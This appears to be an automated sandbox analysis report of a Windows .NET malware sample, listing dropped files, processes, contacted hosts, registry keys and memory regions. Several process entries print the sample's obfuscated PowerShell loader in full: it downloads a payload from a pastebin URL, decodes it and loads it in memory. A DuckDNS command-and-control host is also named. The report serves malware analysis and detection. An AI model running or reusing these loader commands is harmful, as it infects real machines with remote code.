Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\jglbwx.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (857), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mknrez.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (857), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1knd0nyk.ir3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ihy1sfk.lrd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52d2ecu1.3fi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1conrqx.qio.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhxbu4vo.mje.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqoczapk.5od.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kivaelxh.5va.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0sagscj.bic.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otvnkbem.tm3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozxxjsoi.t3f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wndbbfqn.qil.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzgjt5xk.mwp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\dll01.txt
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe
|
"C:\Users\user\Desktop\17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jglbwx.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\mknrez.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?QQBk?HY?OQBn?EI?S?Bh?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bt?Gk?e?Bm?HU?I??9?C??Jw?w?DE?Jw?g?Ds?J?Bi?Gg?c?Bn?GU?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bgB1?Gc?awBr?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?CQ?UQBQ?HQ?YQB2?C4?cgBl?H??b?Bh?GM?ZQ?o?Cc?J??k?CQ?J??k?Cc?L??n?EE?Jw?p?C??KQ?g?Ds?WwBT?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?HU?ZwBr?Gs?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?DQ?MgBv?GM?cwBh?C8?bgBp?GE?bQ?v?HM?Z?Bh?GU?a??v?HM?ZgBl?HI?LwBl?HI?aQBm?C8?YQBs?Gw?aQB1?HE?bgBh?HI?cgBh?GI?N??y?D??MgBu?G8?aQBw?G0?YQBo?GM?LwBt?G8?Yw?u?HQ?bgBl?HQ?bgBv?GM?cgBl?HM?dQBi?HU?a?B0?Gk?Zw?u?Hc?YQBy?C8?Lw?6?HM?c?B0?HQ?a??n?C??L??g?CQ?YgBo?H??ZwBl?C??L??g?Cc?aQBn?GY?e?BF?E0?Ng?0?Cc?L??g?CQ?bQBp?Hg?ZgB1?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek
= $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\AppData\Local\Temp\mknrez.vbs');powershell $Yolopolhggobek;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?QQBk?HY?OQBn?EI?S?Bh?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?Hc?bgBn?GM?I??9?C??Jw?w?DE?Jw?g?Ds?J?Bl?GE?YQBp?Hc?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?Z?Bj?Gg?cwBp?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?CQ?UQBQ?HQ?YQB2?C4?cgBl?H??b?Bh?GM?ZQ?o?Cc?J??k?CQ?J??k?Cc?L??n?EE?Jw?p?C??KQ?g?Ds?WwBT?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bk?GM?a?Bz?Gk?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?FQ?ZQBo?HU?b?Bj?Gg?ZQBz?Fg?e?BY?Hg?e??u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBN?HM?cQBC?Ek?YgBZ?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?DQ?Mg?x?DE?VgBP?E4?LwBu?Gk?YQBt?C8?cwBk?GE?ZQBo?C8?cwBm?GU?cg?v?GU?cgBp?GY?LwBh?Gw?b?Bp?HU?cQBu?GE?cgBy?GE?Yg?0?DI?M??y?G4?bwBp?H??bQBh?Gg?Yw?v?G0?bwBj?C4?d?Bu?GU?d?Bu?G8?YwBy?GU?cwB1?GI?dQBo?HQ?aQBn?C4?dwBh?HI?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bl?GE?YQBp?Hc?I??s?C??JwBp?Gc?ZgB4?EU?TQ?n?Cw?I??k?Go?dwBu?Gc?Yw?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek
= $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\AppData\Local\Temp\jglbwx.vbs');powershell $Yolopolhggobek;
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm
= 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm
-OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() +
'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content
-Path $f ) ;$mixfu = '01' ;$bhpge = 'C:\Users\user\AppData\Local\Temp\mknrez.vbs' ;[Byte[]] $nugkk = [system.Convert]::FromBase64String(
$QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($nugkk).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null,
[object[]] ('42ocsa/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $bhpge , 'igfxEM64',
$mixfu, '1', 'Roda' ));"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm
= 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm
-OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() +
'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content
-Path $f ) ;$jwngc = '01' ;$eaaiw = 'C:\Users\user\AppData\Local\Temp\jglbwx.vbs' ;[Byte[]] $dchsi = [system.Convert]::FromBase64String(
$QPtav.replace('$$$$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dchsi).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null,
[object[]] ('4211VON/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $eaaiw , 'igfxEM',
$jwngc, '1', 'Roda' ));"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c
|
||
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c
|
||
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA
-inputFormat xml -outputFormat text
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA
-inputFormat xml -outputFormat text
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
154.216.17.204
|
|||
saviloe24.duckdns.org
|
|||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://crl.microsoF0
|
unknown
|
||
https://pastebin.com/raw/adv9gbha
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://pastebin.com/raw/Adv9gBHa
|
104.20.3.235
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://pastebin.com
|
unknown
|
||
https://pastebin.com
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
saviloe24.duckdns.org
|
154.216.17.204
|
||
pastebin.com
|
104.20.3.235
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
154.216.17.204
|
saviloe24.duckdns.org
|
Seychelles
|
||
127.0.0.1
|
unknown
|
unknown
|
||
104.20.3.235
|
pastebin.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6D2000
|
unkown
|
page readonly
|
||
2AE1000
|
trusted library allocation
|
page read and write
|
||
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
25E9A630000
|
heap
|
page read and write
|
||
2201F710000
|
heap
|
page read and write
|
||
1E92CB10000
|
heap
|
page read and write
|
||
22AD05E0000
|
heap
|
page read and write
|
||
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
25E9C760000
|
trusted library allocation
|
page read and write
|
||
22AD065D000
|
heap
|
page read and write
|
||
25EB45B0000
|
heap
|
page read and write
|
||
23518775000
|
heap
|
page read and write
|
||
7FFE166B1000
|
trusted library allocation
|
page read and write
|
||
7FFE165D6000
|
trusted library allocation
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
22AD0780000
|
trusted library allocation
|
page read and write
|
||
2BDC2820000
|
heap
|
page read and write
|
||
B45000
|
heap
|
page read and write
|
||
7FFE16712000
|
trusted library allocation
|
page read and write
|
||
7FFE166BA000
|
trusted library allocation
|
page read and write
|
||
2357E0A0000
|
heap
|
page read and write
|
||
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
25E9C666000
|
trusted library allocation
|
page read and write
|
||
2646DB70000
|
heap
|
page read and write
|
||
7FFE1650D000
|
trusted library allocation
|
page execute and read and write
|
||
4F6BABF000
|
stack
|
page read and write
|
||
22AD2517000
|
trusted library allocation
|
page read and write
|
||
26456C9D000
|
trusted library allocation
|
page read and write
|
||
7FFE166E2000
|
trusted library allocation
|
page read and write
|
||
C0CF0BE000
|
stack
|
page read and write
|
||
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
C0CF33E000
|
stack
|
page read and write
|
||
23500230000
|
trusted library allocation
|
page read and write
|
||
2357DE5B000
|
heap
|
page read and write
|
||
22031630000
|
trusted library allocation
|
page read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
D44CAFE000
|
stack
|
page read and write
|
||
7FFE16503000
|
trusted library allocation
|
page execute and read and write
|
||
23500347000
|
trusted library allocation
|
page read and write
|
||
264555E0000
|
heap
|
page execute and read and write
|
||
22AE25D9000
|
trusted library allocation
|
page read and write
|
||
7B7E473000
|
stack
|
page read and write
|
||
23500702000
|
trusted library allocation
|
page read and write
|
||
7FFE165D0000
|
trusted library allocation
|
page read and write
|
||
7FFE166B1000
|
trusted library allocation
|
page read and write
|
||
22039720000
|
heap
|
page read and write
|
||
7FFE16504000
|
trusted library allocation
|
page read and write
|
||
7FFE165E0000
|
trusted library allocation
|
page execute and read and write
|
||
22AD07A0000
|
trusted library allocation
|
page read and write
|
||
1BDC95B3000
|
heap
|
page read and write
|
||
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE16774000
|
trusted library allocation
|
page read and write
|
||
71DE80C000
|
stack
|
page read and write
|
||
7FFE166E0000
|
trusted library allocation
|
page execute and read and write
|
||
DDE000
|
stack
|
page read and write
|
||
7FFE167A6000
|
trusted library allocation
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
7FFE166C0000
|
trusted library allocation
|
page execute and read and write
|
||
6C15DFE000
|
stack
|
page read and write
|
||
22AD392E000
|
trusted library allocation
|
page read and write
|
||
1BFBA000
|
stack
|
page read and write
|
||
15FE8020000
|
heap
|
page read and write
|
||
22AD0860000
|
heap
|
page read and write
|
||
26453A30000
|
heap
|
page read and write
|
||
25E9A460000
|
heap
|
page read and write
|
||
2201F7C0000
|
heap
|
page readonly
|
||
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
B6DFA7E000
|
stack
|
page read and write
|
||
7FFE16620000
|
trusted library allocation
|
page execute and read and write
|
||
2646DAB7000
|
heap
|
page read and write
|
||
2351876D000
|
heap
|
page read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
2BDA8754000
|
heap
|
page read and write
|
||
25EB46B0000
|
heap
|
page read and write
|
||
7FFE166D0000
|
trusted library allocation
|
page read and write
|
||
71DD5FD000
|
stack
|
page read and write
|
||
1E92CAE0000
|
heap
|
page read and write
|
||
7FFE16700000
|
trusted library allocation
|
page read and write
|
||
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
7FFE1652D000
|
trusted library allocation
|
page execute and read and write
|
||
15FE7D98000
|
heap
|
page read and write
|
||
71DDB7E000
|
stack
|
page read and write
|
||
4F6B67E000
|
stack
|
page read and write
|
||
2646DCBE000
|
heap
|
page read and write
|
||
25E9A4E6000
|
heap
|
page read and write
|
||
1B96B000
|
heap
|
page read and write
|
||
2DC21E20000
|
heap
|
page read and write
|
||
7FFE165CC000
|
trusted library allocation
|
page execute and read and write
|
||
1B8DC000
|
heap
|
page read and write
|
||
2645703F000
|
trusted library allocation
|
page read and write
|
||
7FFE165DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE166F2000
|
trusted library allocation
|
page read and write
|
||
22AE235F000
|
trusted library allocation
|
page read and write
|
||
1B7CD000
|
stack
|
page read and write
|
||
7FFE16606000
|
trusted library allocation
|
page execute and read and write
|
||
25E9C3A0000
|
trusted library allocation
|
page read and write
|
||
18E0AA75000
|
heap
|
page read and write
|
||
D44CB7E000
|
stack
|
page read and write
|
||
2BDAA130000
|
trusted library allocation
|
page read and write
|
||
7FFE16510000
|
trusted library allocation
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
1BDC93C0000
|
heap
|
page read and write
|
||
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
235187D0000
|
heap
|
page read and write
|
||
7FFE16640000
|
trusted library allocation
|
page execute and read and write
|
||
1B98B000
|
heap
|
page read and write
|
||
2203971B000
|
heap
|
page read and write
|
||
22AD393A000
|
trusted library allocation
|
page read and write
|
||
26453AA0000
|
heap
|
page read and write
|
||
264538F0000
|
heap
|
page read and write
|
||
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
7FFE16530000
|
trusted library allocation
|
page read and write
|
||
22AD391E000
|
trusted library allocation
|
page read and write
|
||
108C000
|
stack
|
page read and write
|
||
2BDC2803000
|
heap
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
22AD0612000
|
heap
|
page read and write
|
||
7B7E6FF000
|
stack
|
page read and write
|
||
2BDAA0A0000
|
trusted library allocation
|
page read and write
|
||
C0CF3BE000
|
stack
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
22AD07D2000
|
trusted library allocation
|
page read and write
|
||
7FFE165DC000
|
trusted library allocation
|
page execute and read and write
|
||
235187A3000
|
heap
|
page read and write
|
||
2201F7D5000
|
heap
|
page read and write
|
||
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
15FE9C0A000
|
heap
|
page read and write
|
||
2BDAA170000
|
heap
|
page read and write
|
||
7FFE168A0000
|
trusted library allocation
